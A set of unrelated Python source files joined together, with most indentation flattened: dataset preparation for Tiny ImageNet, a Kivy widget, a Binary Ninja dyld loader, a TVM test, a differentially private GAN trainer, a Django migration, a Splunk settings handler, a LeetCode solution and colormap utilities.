os.mkdir(val_wnind_dir)
os.mkdir(val_wnind_images_dir)
wnind_boxes = "%s/%s_boxes.txt" % (val_wnind_dir, wnind)
f = open(wnind_boxes, "w")
for img_name, box in entries:
source = "%s/%s" % (val_images_dir, img_name)
dst = "%s/%s" % (val_wnind_images_dir, img_name)
os.system("cp %s %s" % (source, dst))
f.write("%s\t%s\n" % (img_name, box))
f.close()
os.system("rm -rf %s" % val_images_dir)
print("Cleaning up: %s" % val_images_dir)
print("Formatting val done")
def split_train_test():
split_quota = 0.7
print("Splitting Train+Val into %s-%s" % (split_quota*100, (1 - split_quota)*100))
base_dir = "%s/tiny-imagenet-200" % os.getcwd()
train_dir = "%s/train" % base_dir
val_dir = "%s/val" % base_dir
fwnind = "%s/wnids.txt" % base_dir
wninds = set()
with open(fwnind, "r") as f:
for wnind in f:
wninds.add(wnind.strip())
assert(len(wninds) == 200)
new_train_dir = "%s/new_train" % base_dir
new_test_dir = "%s/new_test" % base_dir
os.mkdir(new_train_dir)
os.mkdir(new_test_dir)
total_ntrain = 0
total_ntest = 0
for wnind in wninds:
wnind_ntrain = 0
wnind_ntest = 0
new_train_wnind_dir = "%s/%s" % (new_train_dir, wnind)
new_test_wnind_dir = "%s/%s" % (new_test_dir, wnind)
os.mkdir(new_train_wnind_dir)
os.mkdir(new_test_wnind_dir)
os.mkdir(new_train_wnind_dir+"/images")
os.mkdir(new_test_wnind_dir+"/images")
new_train_wnind_boxes = "%s/%s_boxes.txt" % (new_train_wnind_dir, wnind)
f_ntrain = open(new_train_wnind_boxes, "w")
new_test_wnind_boxes = "%s/%s_boxes.txt" % (new_test_wnind_dir, wnind)
f_ntest = open(new_test_wnind_boxes, "w")
dirs = [train_dir, val_dir]
for wdir in dirs:
wnind_dir = "%s/%s" % (wdir, wnind)
wnind_boxes = "%s/%s_boxes.txt" % (wnind_dir, wnind)
imgs = []
with open(wnind_boxes, "r") as f:
for line in f:
line = line.strip().split()
img_name = line[0]
boxes = '\t'.join(line[1:])
imgs.append((img_name, boxes))
print("[Old] wind: %s - #: %s" % (wnind, len(imgs)))
shuffle(imgs)
            split_n = floor(len(imgs)*split_quota)
train_imgs = imgs[:split_n]
test_imgs = imgs[split_n:]
for img_name, box in train_imgs:
source = "%s/images/%s" % (wnind_dir, img_name)
dst = "%s/images/%s" % (new_train_wnind_dir, img_name)
os.system("cp %s %s" % (source, dst))
f_ntrain.write("%s\t%s\n" % (img_name, box))
wnind_ntrain += 1
for img_name, box in test_imgs:
source = "%s/images/%s" % (wnind_dir, img_name)
dst = "%s/images/%s" % (new_test_wnind_dir, img_name)
os.system("cp %s %s" % (source, dst))
f_ntest.write("%s\t%s\n" % (img_name, box))
wnind_ntest += 1
f_ntrain.close()
f_ntest.close()
print("[New] wnind: %s - #train: %s - #test: %s" % (wnind, wnind_ntrain,
wnind_ntest))
total_ntrain += wnind_ntrain
total_ntest += wnind_ntest
print("[New] #train: %s - #test: %s" % (total_ntrain, total_ntest))
os.system("rm -rf %s" % train_dir)
os.system("rm -rf %s" % val_dir)
print("Cleaning up: %s" % train_dir)
print("Cleaning up: %s" % val_dir)
print("Created new train data at: %s" % new_train_dir)
print("Cleaning new test data at: %s" % new_test_dir)
print("Splitting dataset done")
def main():
# download_dataset()
unzip_data()
format_val()
# split_train_test()
if __name__ == '__main__':
main()
|
python
|
from behaviors.button import ButtonBehavior, ToggleButtonBehavior
from behaviors.touch_effecs import EffectBehavior
from kivy.uix.image import Image
from kivy.uix.anchorlayout import AnchorLayout
from kivy.properties import (
ListProperty, ObjectProperty,
)
from kivy.graphics import Color, Rectangle
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.clock import Clock
Builder.load_string('''
<KVAnchorIcon>:
size_hint_x:None
width:'70dp'
anchor_x:'center'
anchor_y:'center'
<KVButtonIcon>:
icon_color:[1, 1, 1, 1]
size_hint:None, None
size:'40dp', '40dp'
mipmap:True
    allow_stretch:True
keep_ratio:False
canvas:
Clear
canvas.before:
Clear
Color:
rgba:self.icon_color
Rectangle:
texture:self.texture
pos:self.pos
size:self.size
<KVToggleButtonIcon>:
size:'30dp', '30dp'
''', filename="KVIcon.kv")
class KVAnchorIcon(AnchorLayout):
background_color = ListProperty([0, 0, 0, 0])
back = ObjectProperty(None)
def on_background_color(self, *args):
self.unbind(size=self.update_background)
self.unbind(pos=self.update_background)
self.bind(size=self.update_background)
self.bind(pos=self.update_background)
with self.canvas.before:
Color(rgba=self.background_color)
self.back = Rectangle(size=self.size, pos=self.pos)
def update_background(self, *args):
self.back.size = self.size
self.back.pos = self.pos
class KVButtonIcon(EffectBehavior, ButtonBehavior, Image):
effect_color = ListProperty([0, 0, 0, 0])
defaut_color = ListProperty([1, 1, 1, 1])
pos_color = ListProperty([0, 0, 0, 0])
pos_sources = ListProperty([])
state_sources = ListProperty([])
enter_pos = False
def __init__(self, **kwargs):
self.register_event_type('on_mouse_inside')
self.register_event_type('on_mouse_outside')
self.bind(
pos_sources=self.config,
state_sources=self.config,
defaut_color=self.config,
)
super(KVButtonIcon, self).__init__(**kwargs)
self.type_button = 'Rounded'
Window.bind(mouse_pos=self.on_mouse_pos)
Clock.schedule_once(self.config)
def config(self, *args):
if len(self.pos_sources) == 2:
self.source = self.pos_sources[0]
if len(self.state_sources) == 2:
self.source = self.state_sources[0]
if self.defaut_color != [1, 1, 1, 1]:
self.icon_color = self.defaut_color
def on_state(self, widget, state):
if len(self.state_sources) == 2:
if state == 'normal':
self.source = self.state_sources[0]
elif state == 'down':
self.source = self.state_sources[1]
def on_mouse_pos(self, window, mouse_pos):
if self.collide_point(*self.to_widget(*mouse_pos)):
self.enter_pos = True
self.dispatch('on_mouse_inside')
if len(self.pos_sources) == 2:
self.source = self.pos_sources[1]
if self.pos_color != [0, 0, 0, 0]:
self.icon_color = self.pos_color
return None
if len(self.pos_sources) == 2:
self.source = self.pos_sources[0]
if self.defaut_color != [1, 1, 1, 1]:
self.icon_color = self.defaut_color
if self.enter_pos:
self.enter_pos = False
self.dispatch('on_mouse_outside')
def on_touch_down(self, touch):
if touch.is_mouse_scrolling:
return False
elif self in touch.ud:
return False
if self.collide_point(*touch.pos):
touch.grab(self)
self.ripple_show(touch)
return super(KVButtonIcon, self).on_touch_down(touch)
return False
def on_touch_up(self, touch):
if touch.grab_current is self:
touch.ungrab(self)
self.ripple_fade()
return super(KVButtonIcon, self).on_touch_up(touch)
def on_mouse_inside(self):
pass
def on_mouse_outside(self):
pass
class KVToggleButtonIcon(ToggleButtonBehavior, KVButtonIcon):
pass
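# --- Minimal usage sketch (illustrative; the image paths are placeholders) ---
# pos_sources and state_sources each expect exactly two images
# (normal/hover and normal/down), matching the length-2 checks in
# config(), on_state() and on_mouse_pos().
#
# Builder.load_string('''
# KVAnchorIcon:
#     background_color: 0.15, 0.15, 0.15, 1
#     KVButtonIcon:
#         pos_sources: ['icons/home.png', 'icons/home_hover.png']
#         state_sources: ['icons/home.png', 'icons/home_down.png']
#         effect_color: 1, 1, 1, 0.3
# ''')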
|
python
|
import os
from sys import argv
tobs = int(argv[1])
# Merge the last 10000 lines of each task's hb_list output into a single file per window
for i in range(6):
    if i != 4:  # window 4 is skipped
for j in range(10):
if j==0:
os.system('tail -10000 tobs%d/window%d/hb_list_tobs_%d_task_%d.dat > tobs%d/window%d/window%d.dat'%(tobs,i,tobs,j,tobs,i,i))
else:
os.system('tail -10000 tobs%d/window%d/hb_list_tobs_%d_task_%d.dat >> tobs%d/window%d/window%d.dat'%(tobs,i,tobs,j,tobs,i,i))
|
python
|
import os
import sys
from binaryninja import *
from binaryninja.binaryview import BinaryView
from binaryninja.platform import Platform
from .browser import ImagePickerDialog
# Binary Ninja doesn't load modules from a plugin's directory by default,
# so we add it to sys.path manually.
# We do this after importing binaryninja because, in my local workspace, I embed a copy of
# the binaryninja API so my IDE can handle intellisense.
# This won't interfere, since binja won't see that directory properly.
this_script = os.path.realpath(__file__)
this_dir = os.path.dirname(this_script)
sys.path.insert(0, this_dir)
sys.path.insert(0, this_dir + os.path.sep + 'ktool')
from io import BytesIO
from DyldExtractor.extraction_context import ExtractionContext
from DyldExtractor.macho.macho_context import MachOContext
from DyldExtractor.dyld.dyld_context import DyldContext
from DyldExtractor.converter import (
slide_info,
macho_offset,
linkedit_optimizer,
stub_fixer,
objc_fixer
)
import ktool
def internal_print_rewrite(msg):
log.log(LogLevel.InfoLog, msg)
print = internal_print_rewrite
class DyldCacheHander:
def __init__(self, filename):
self.filename = filename
self.images = []
self.image_map = {}
self.fp = open(filename, 'rb')
self.dyld_context = None
def populate_image_list(self):
self.dyld_context = DyldContext(self.fp)
for imageData in self.dyld_context.images:
path = self.dyld_context.readString(imageData.pathFileOffset)
path = path[0:-1] # remove null terminator
path = path.decode("utf-8")
self.images.append(path)
self.image_map[path] = imageData
# noinspection PyAbstractClass
class DyldSharedCacheView(BinaryView):
name = "DyldSharedCache"
long_name = "Dyld Shared Cache Loader"
def __init__(self, data):
BinaryView.__init__(self, parent_view=data, file_metadata=data.file)
self.cache_handler = DyldCacheHander(data.file.filename)
def init(self):
# TODO: not hardcode
        self.platform = Platform["mac-aarch64"]
self.cache_handler.populate_image_list()
# Use the fancy image picker if the UI is enabled
if core_ui_enabled():
ipd = ImagePickerDialog(self.cache_handler.images)
ipd.run()
# Can happen if the dialog is rejected
if ipd.chosen_image is None:
return False
image = self.cache_handler.image_map[ipd.chosen_image]
else:
mod_index = get_choice_input(f'Found {len(self.cache_handler.images)} Images', f'Select Image',
self.cache_handler.images)
mod = self.cache_handler.images[mod_index]
image = self.cache_handler.image_map[mod]
_macho_offset, context = self.cache_handler.dyld_context.convertAddr(image.address)
macho_ctx = MachOContext(context.fileObject, _macho_offset, True)
extraction_ctx = ExtractionContext(self.cache_handler.dyld_context, macho_ctx)
slide_info.processSlideInfo(extraction_ctx)
linkedit_optimizer.optimizeLinkedit(extraction_ctx)
stub_fixer.fixStubs(extraction_ctx)
objc_fixer.fixObjC(extraction_ctx)
write_procedures = macho_offset.optimizeOffsets(extraction_ctx)
virt_macho = BytesIO()
# Write the MachO file
for procedure in write_procedures:
virt_macho.seek(0)
virt_macho.seek(procedure.writeOffset)
virt_macho.write(
procedure.fileCtx.getBytes(procedure.readOffset, procedure.size)
)
virt_macho.seek(0)
image = ktool.load_image(virt_macho)
for segment in image.segments.values():
segment: ktool.macho.Segment = segment
seg_dat = image.get_bytes_at(segment.file_address, segment.size)
# We can map all of these as RWX or ---, it makes no difference.
# This view wont be analyzing, and MachO or ObjectiveNinja will properly map them.
self.add_auto_segment(segment.vm_address, segment.size, segment.file_address, segment.size, SegmentFlag.SegmentReadable)
self.write(segment.vm_address, bytes(seg_dat))
self.abort_analysis()
return True
@classmethod
def is_valid_for_data(cls, data):
hdr = data.read(0, 16)
if len(hdr) < 16:
return False
if b'dyld_v1' not in hdr:
return False
return True
|
python
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations # must import to defer parsing of annotations
import pytest
import tvm
from tvm import relax
from tvm.script import relax as R
import numpy as np
@tvm.script.ir_module
class InputModule:
@R.function
def foo(x: Tensor((m, n), "int64")):
y = relax.unique(x, sorted=False)
y_sorted = relax.unique(x)
return y, y_sorted
def test_unique():
mod = InputModule
# TODO(prakalp): also add test for compiling and running on cuda device.
target = tvm.target.Target("llvm")
ex = relax.vm.build(mod, target)
vm = relax.VirtualMachine(ex, tvm.cpu())
data_numpy = np.random.randint(0, 16, (16, 16))
data = tvm.nd.array(data_numpy)
result, result_sorted = vm["foo"](data)
expected_output_sorted, indices = np.unique(data_numpy, return_index=True)
expected_output = [data_numpy.flatten()[index] for index in sorted(indices, reverse=True)]
np.testing.assert_array_equal(expected_output_sorted, result_sorted.numpy())
np.testing.assert_array_equal(expected_output, result.numpy())
if __name__ == "__main__":
pytest.main([__file__])
|
python
|
import argparse
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from dp_autoencoder import Autoencoder
import mimic_dataset
import dp_optimizer
import sampling
import analysis
# Deterministic output
torch.manual_seed(0)
np.random.seed(0)
class Generator(nn.Module):
def __init__(self, input_dim, output_dim, binary=True, device='cpu'):
super(Generator, self).__init__()
def block(inp, out, Activation, device):
return nn.Sequential(
nn.Linear(inp, out, bias=False),
nn.LayerNorm(out),
Activation(),
).to(device)
self.block_0 = block(input_dim, input_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
self.block_1 = block(input_dim, input_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
self.block_2 = block(input_dim, output_dim, nn.Tanh if binary else lambda: nn.LeakyReLU(0.2), device)
def forward(self, x):
x = self.block_0(x) + x
x = self.block_1(x) + x
x = self.block_2(x)
return x
class Discriminator(nn.Module):
def __init__(self, input_dim, device='cpu'):
super(Discriminator, self).__init__()
self.model = nn.Sequential(
nn.Linear(input_dim, (2 * input_dim) // 3),
nn.LeakyReLU(0.2),
nn.Linear((2 * input_dim) // 3, input_dim // 3),
nn.LeakyReLU(0.2),
nn.Linear(input_dim // 3, 1),
).to(device)
def forward(self, x):
return self.model(x)
def train(params):
dataset = {
'mimic': mimic_dataset,
}[params['dataset']]
_, train_dataset, _, _ = dataset.get_datasets()
with open('dp_autoencoder.dat', 'rb') as f:
autoencoder = torch.load(f)
decoder = autoencoder.get_decoder()
generator = Generator(
input_dim=params['latent_dim'],
output_dim=autoencoder.get_compression_dim(),
binary=params['binary'],
device=params['device'],
)
g_optimizer = torch.optim.RMSprop(
params=generator.parameters(),
lr=params['lr'],
alpha=params['alpha'],
weight_decay=params['l2_penalty'],
)
discriminator = Discriminator(
input_dim=np.prod(train_dataset[0].shape),
device=params['device'],
)
d_optimizer = dp_optimizer.DPRMSprop(
l2_norm_clip=params['l2_norm_clip'],
noise_multiplier=params['noise_multiplier'],
minibatch_size=params['minibatch_size'],
microbatch_size=params['microbatch_size'],
params=discriminator.parameters(),
lr=params['lr'],
alpha=params['alpha'],
weight_decay=params['l2_penalty'],
)
print('Achieves ({}, {})-DP'.format(
analysis.epsilon(
len(train_dataset),
params['minibatch_size'],
params['noise_multiplier'],
params['iterations'],
params['delta']
),
params['delta'],
))
minibatch_loader, microbatch_loader = sampling.get_data_loaders(
params['minibatch_size'],
params['microbatch_size'],
params['iterations'],
)
iteration = 0
for X_minibatch in minibatch_loader(train_dataset):
d_optimizer.zero_grad()
for real in microbatch_loader(X_minibatch):
real = real.to(params['device'])
z = torch.randn(real.size(0), params['latent_dim'], device=params['device'], requires_grad=False)
fake = decoder(generator(z)).detach()
d_optimizer.zero_microbatch_grad()
d_loss = -torch.mean(discriminator(real)) + torch.mean(discriminator(fake))
d_loss.backward()
d_optimizer.microbatch_step()
d_optimizer.step()
for parameter in discriminator.parameters():
parameter.data.clamp_(-params['clip_value'], params['clip_value'])
if iteration % params['d_updates'] == 0:
z = torch.randn(X_minibatch.size(0), params['latent_dim'], device=params['device'], requires_grad=False)
fake = decoder(generator(z))
g_optimizer.zero_grad()
g_loss = -torch.mean(discriminator(fake))
g_loss.backward()
g_optimizer.step()
if iteration % 100 == 0:
print('[Iteration %d/%d] [D loss: %f] [G loss: %f]' % (iteration, params['iterations'], d_loss.item(), g_loss.item()))
iteration += 1
if iteration % 1000 == 0:
with open('dpwgans1/{}.dat'.format(iteration), 'wb') as f:
torch.save(generator, f)
return generator
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--alpha', type=float, default=0.99, help='smoothing parameter for RMS prop (default: 0.99)')
parser.add_argument('--binary', type=bool, default=True, help='whether data type is binary (default: true)')
parser.add_argument('--clip-value', type=float, default=0.01, help='upper bound on weights of the discriminator (default: 0.01)')
    parser.add_argument('--d-updates', type=int, default=10, help='number of iterations to update discriminator per generator update (default: 10)')
    parser.add_argument('--dataset', type=str, default='mimic', help='the dataset to be used for training (default: mimic)')
    parser.add_argument('--delta', type=float, default=1e-5, help='delta for epsilon calculation (default: 1e-5)')
    parser.add_argument('--device', type=str, default=('cuda' if torch.cuda.is_available() else 'cpu'), help='whether or not to use cuda (default: cuda if available)')
    parser.add_argument('--iterations', type=int, default=10000, help='number of iterations to train (default: 10000)')
    parser.add_argument('--l2-norm-clip', type=float, default=0.022, help='upper bound on the l2 norm of gradient updates (default: 0.022)')
    parser.add_argument('--l2-penalty', type=float, default=0., help='l2 penalty on model weights (default: 0)')
    parser.add_argument('--latent-dim', type=int, default=64, help='dimensionality of the latent space (default: 64)')
    parser.add_argument('--lr', type=float, default=0.005, help='learning rate (default: 0.005)')
    parser.add_argument('--microbatch-size', type=int, default=1, help='input microbatch size for training (default: 1)')
    parser.add_argument('--minibatch-size', type=int, default=128, help='input minibatch size for training (default: 128)')
parser.add_argument('--noise-multiplier', type=float, default=3.5, help='ratio between clipping bound and std of noise applied to gradients (default: 3.5)')
params = vars(parser.parse_args())
generator = train(params)
with open('dp_generator.dat', 'wb') as f:
torch.save(generator, f)
|
python
|
# Generated by Django 3.0.1 on 2020-01-06 22:04
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0008_message_front_key'),
]
operations = [
migrations.AddField(
model_name='message',
name='pending_read',
field=models.ManyToManyField(related_name='unread_messages', to=settings.AUTH_USER_MODEL),
),
]
|
python
|
# the first import can't be removed
import scripted_rest_sys_path
from dbx2.dbx_logger import logger
import splunk, os, json
from json import loads
from dbx2.simple_rest import SimpleRest
from dbx2.java_home_detector import JavaHomeDetector
from dbx2.splunk_client.splunk_service_factory import SplunkServiceFactory
import splunklib.client as client
import jvm_options
from dbx2.jre_validator import validateJRE, checkDependencies
import requests
class Settings(SimpleRest):
endpoint = "configs/conf-dbx_settings/java"
defaultPort = 9998
commands_endpoint = "configs/conf-commands/%s"
java_commands = ["dbxquery", "dbxoutput", "dbxlookup"]
customized_java_path = "customized.java.path"
taskserverPortProperty = "dw.server.applicationConnectors[0].port"
taskserverPortRegex = r'dw\.server\.applicationConnectors\[0\]\.port=(\d+)'
restart_url = "https://localhost:%s/api/taskserver"
def illegalAction(self, verb):
self.response.setStatus(405)
self.addMessage('ERROR', 'HTTP %s not supported by the settings handler' % verb, 405)
def handle_DELETE(self):
self.illegalAction('DELETE')
def handle_PUT(self):
        self.handle_POST()
def handle_PATCH(self):
        self.handle_POST()
def handle_GET(self):
try:
splunk_service = SplunkServiceFactory.create(self.sessionKey, app='splunk_app_db_connect',
owner=self.userName)
content = client.Entity(splunk_service, self.endpoint).content
self.check_java_home(content)
self.read_vmopts(content)
self.writeJson(content)
except Exception as ex:
self.response.setStatus(500)
self.writeJson({
"code": 500,
"message": ex.message,
"detail": str(ex)
})
def handle_POST(self):
try:
pre_taskserverport = self.read_taskserver_port()
payload = loads(self.request['payload'])
self.check_java_home(payload)
# check whether the javaHome is valid
self.validate_java_home(payload["javaHome"])
self.update_vmopts(payload)
splunk_service = SplunkServiceFactory.create(self.sessionKey, app='splunk_app_db_connect',
owner=self.userName)
entity = client.Entity(splunk_service, self.endpoint)
entity.update(**payload).refresh()
logger.debug('updated java settings')
self.update_dbx_java_home(payload["javaHome"])
self.reset_java_command_filename(splunk_service)
self.read_vmopts(entity.content)
self.restart_task_server(pre_taskserverport)
self.writeJson(entity.content)
except Exception as ex:
self.response.setStatus(500)
self.writeJson({
"code": 500,
"message": ex.message,
"detail": str(ex)
})
def check_java_home(self, content):
if "javaHome" not in content:
if "JAVA_HOME" in os.environ:
java_home = os.environ["JAVA_HOME"].replace('"', '')
content["javaHome"] = java_home
else:
try:
java_home = JavaHomeDetector.detect()
content["javaHome"] = java_home
except Exception as ex:
logger.warn("java home auto detection failed")
content["javaHome"] = ""
# DBX-3248 write java home to specific file so that it can be used to start server and java search command.
def update_dbx_java_home(self, javaHome):
app_dir = os.path.join(os.path.dirname(__file__), '..')
java_path_darwin = os.path.join(app_dir, "darwin_x86_64", "bin", self.customized_java_path)
java_path_linux32 = os.path.join(app_dir, "linux_x86", "bin", self.customized_java_path)
java_path_linux64 = os.path.join(app_dir, "linux_x86_64", "bin", self.customized_java_path)
java_path_win32 = os.path.join(app_dir, "windows_x86", "bin", self.customized_java_path)
java_path_win64 = os.path.join(app_dir, "windows_x86_64", "bin", self.customized_java_path)
java_home_files = [
{"filename": java_path_darwin, "suffix": "/bin/java"},
{"filename": java_path_linux32, "suffix": "/bin/java"},
{"filename": java_path_linux64, "suffix": "/bin/java"},
{"filename": java_path_win32, "suffix": "\\bin\\java.exe"},
{"filename": java_path_win64, "suffix": "\\bin\\java.exe"}
]
for java_home_file in java_home_files:
try:
with open(java_home_file["filename"], "w") as file:
file.write(javaHome + java_home_file["suffix"])
logger.info('update java path file [%s]' % java_home_file["filename"])
except IOError as er:
logger.error('unable to update java path file [%s]' % java_home_file["filename"])
raise
def reset_java_command_filename(self, splunk_service):
for java_command in self.java_commands:
entity = client.Entity(splunk_service, self.commands_endpoint % java_command)
# If customer have set the filename to "customized.java.path", we need to reset it to "java.path"
# Related issue: DBX-3746
if entity["filename"] == self.customized_java_path:
entity.update(filename="java.path").refresh()
logger.debug("action=reset_java_command_filename command=%s" % java_command)
def read_vmopts(self, content):
content['jvmOptions'] = ''
content['taskServerPort'] = self.defaultPort
try:
jvmopts = jvm_options.read()
content['jvmOptions'] = jvmopts
taskServerPort = jvm_options.get_property(jvmopts, self.taskserverPortProperty, self.taskserverPortRegex)
if taskServerPort:
content['taskServerPort'] = int(taskServerPort)
except Exception as ex:
logger.error('unable to read vmopts file [%s]' % ex)
raise
def update_vmopts(self, content):
try:
jvmopts = content.pop('jvmOptions', '') # jvmOptions may contain taskServerPort settings
taskServerPort = content.pop('taskServerPort', self.defaultPort)
logger.debug('action=get_vmopts_from_postdata, jvmOptions: [%s], taskServerPort: [%s]'
% (jvmopts, taskServerPort))
if not isinstance(taskServerPort, int):
raise Exception("task server port must be a int value")
if taskServerPort < 1024 or taskServerPort > 65535:
raise Exception('task server port must be a number in [1024, 65535]')
jvmopts = jvm_options.set_property(jvmopts, self.taskserverPortProperty, self.taskserverPortRegex, str(taskServerPort))
jvm_options.write(jvmopts)
except Exception as ex:
logger.error('unable to update vmopts file [%s]' % ex)
raise
def validate_java_home(self, java_home):
if os.path.isdir(java_home):
java_cmd = os.path.join(java_home, "bin", "java")
is_valid, reason = validateJRE(java_cmd)
if is_valid:
is_valid, reason = checkDependencies(java_home)
if not is_valid:
raise Exception(reason)
else:
raise Exception("JAVA_HOME path not exist")
@classmethod
def read_taskserver_port(cls):
try:
jvmopts = jvm_options.read()
taskServerPort = jvm_options.get_property(jvmopts, cls.taskserverPortProperty, cls.taskserverPortRegex)
if taskServerPort:
return taskServerPort
else:
return cls.defaultPort
except Exception as ex:
            logger.error('unable to read vmopts file, use default port %s, error info: [%s]' % (cls.defaultPort, ex))
return cls.defaultPort
def restart_task_server(self, taskserver_port):
try:
# settings update successfully, then trigger restart server api to make change taking effect
requests.delete(self.restart_url % taskserver_port, verify=False)
except Exception as ex:
# if task server is not running, this request will failed
logger.warn("action=restart_task_server_request_failed", ex)
|
python
|
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# a ^ 0 == a
# a ^ a == 0
# a ^ b ^ a = a ^ a ^ b = 0 ^ b = b
a = 0
for i in nums:
a ^= i
print(a)
return a
print(15 ^ 10)
print(10 ^ 15)
solver = Solution()
solver.singleNumber([4,1,2,1,2])
|
python
|
# This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
"""
Utilities for handling color maps and color bars
"""
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Luke Van Roekel, Greg Streletz
from __future__ import absolute_import, division, print_function, \
unicode_literals
import matplotlib.pyplot as plt
import matplotlib.colors as cols
import numpy as np
from matplotlib.colors import LinearSegmentedColormap
import xml.etree.ElementTree as ET
from six.moves import configparser
import cmocean
import pkg_resources
from six import string_types
import mpas_analysis.shared.plot.ScientificColourMaps5
def setup_colormap(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
Returns
-------
colormapDict : dict
A dictionary of colormap information.
'colormap' specifies the name of the new colormap
'norm' is a matplotlib norm object used to normalize the colormap
'levels' is an array of contour levels or ``None`` if not using indexed
color map
'ticks' is an array of values where ticks should be placed
'contours' is an array of contour values to plot or ``None`` if none
have been specified
'lineWidth' is the width of contour lines or ``None`` if not specified
'lineColor' is the color of contour lines or ``None`` if not specified
'''
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Greg Streletz
register_custom_colormaps()
colormapType = config.get(configSectionName,
'colormapType{}'.format(suffix))
if colormapType == 'indexed':
(colormap, norm, levels, ticks) = _setup_indexed_colormap(
config, configSectionName, suffix=suffix)
elif colormapType == 'continuous':
(colormap, norm, ticks) = _setup_colormap_and_norm(
config, configSectionName, suffix=suffix)
levels = None
else:
raise ValueError('config section {} option colormapType{} is not '
'"indexed" or "continuous"'.format(
configSectionName, suffix))
option = 'contourLevels{}'.format(suffix)
if config.has_option(configSectionName, option):
contours = config.getExpression(configSectionName,
option,
usenumpyfunc=True)
if isinstance(contours, string_types) and contours == 'none':
contours = None
else:
contours = None
option = 'contourThickness{}'.format(suffix)
if config.has_option(configSectionName, option):
lineWidth = config.getfloat(configSectionName, option)
else:
lineWidth = None
option = 'contourColor{}'.format(suffix)
if config.has_option(configSectionName, option):
lineColor = config.get(configSectionName, option)
else:
lineColor = None
return {'colormap': colormap, 'norm': norm, 'levels': levels,
'ticks': ticks, 'contours': contours, 'lineWidth': lineWidth,
'lineColor': lineColor}
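# --- Minimal usage sketch of the dict returned by setup_colormap ---
# (Illustrative only; ``lon``, ``lat`` and ``field`` are placeholder arrays and
# the function name is hypothetical, not part of this module's public API.)
def _example_plot_with_colormap_dict(colormapDict, lon, lat, field):
    # Filled contours (or pcolormesh) use the colormap and norm together;
    # 'levels' is only set for indexed color maps.
    if colormapDict['levels'] is None:
        plot = plt.pcolormesh(lon, lat, field,
                              cmap=colormapDict['colormap'],
                              norm=colormapDict['norm'])
    else:
        plot = plt.contourf(lon, lat, field,
                            cmap=colormapDict['colormap'],
                            norm=colormapDict['norm'],
                            levels=colormapDict['levels'])
    cbar = plt.colorbar(plot, ticks=colormapDict['ticks'])
    # Optional overlaid contour lines, if requested in the config
    if colormapDict['contours'] is not None:
        plt.contour(lon, lat, field,
                    levels=colormapDict['contours'],
                    colors=colormapDict['lineColor'],
                    linewidths=colormapDict['lineWidth'])
    return cbar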
def register_custom_colormaps():
name = 'ferret'
backgroundColor = (0.9, 0.9, 0.9)
red = np.array([[0, 0.6],
[0.15, 1],
[0.35, 1],
[0.65, 0],
[0.8, 0],
[1, 0.75]])
green = np.array([[0, 0],
[0.1, 0],
[0.35, 1],
[1, 0]])
blue = np.array([[0, 0],
[0.5, 0],
[0.9, 0.9],
[1, 0.9]])
colorCount = 21
colorList = np.ones((colorCount, 4), float)
colorList[:, 0] = np.interp(np.linspace(0, 1, colorCount),
red[:, 0], red[:, 1])
colorList[:, 1] = np.interp(np.linspace(0, 1, colorCount),
green[:, 0], green[:, 1])
colorList[:, 2] = np.interp(np.linspace(0, 1, colorCount),
blue[:, 0], blue[:, 1])
colorList = colorList[::-1, :]
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
colorMap.set_bad(backgroundColor)
_register_colormap_and_reverse(name, colorMap)
name = 'erdc_iceFire_H'
colorArray = np.array([
[-1, 4.05432e-07, 0, 5.90122e-06],
[-0.87451, 0, 0.120401, 0.302675],
[-0.74902, 0, 0.216583, 0.524574],
[-0.623529, 0.0552475, 0.345025, 0.6595],
[-0.498039, 0.128047, 0.492588, 0.720288],
[-0.372549, 0.188955, 0.641309, 0.792092],
[-0.247059, 0.327673, 0.784935, 0.873434],
[-0.121569, 0.60824, 0.892164, 0.935547],
[0.00392157, 0.881371, 0.912178, 0.818099],
[0.129412, 0.951407, 0.835621, 0.449279],
[0.254902, 0.904481, 0.690489, 0],
[0.380392, 0.85407, 0.510864, 0],
[0.505882, 0.777093, 0.33018, 0.00088199],
[0.631373, 0.672862, 0.139087, 0.00269398],
[0.756863, 0.508815, 0, 0],
[0.882353, 0.299417, 0.000366289, 0.000547829],
[1, 0.0157519, 0.00332021, 4.55569e-08]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
name = 'erdc_iceFire_L'
colorArray = np.array([
[-1, 0.870485, 0.913768, 0.832905],
[-0.87451, 0.586919, 0.887865, 0.934003],
[-0.74902, 0.31583, 0.776442, 0.867858],
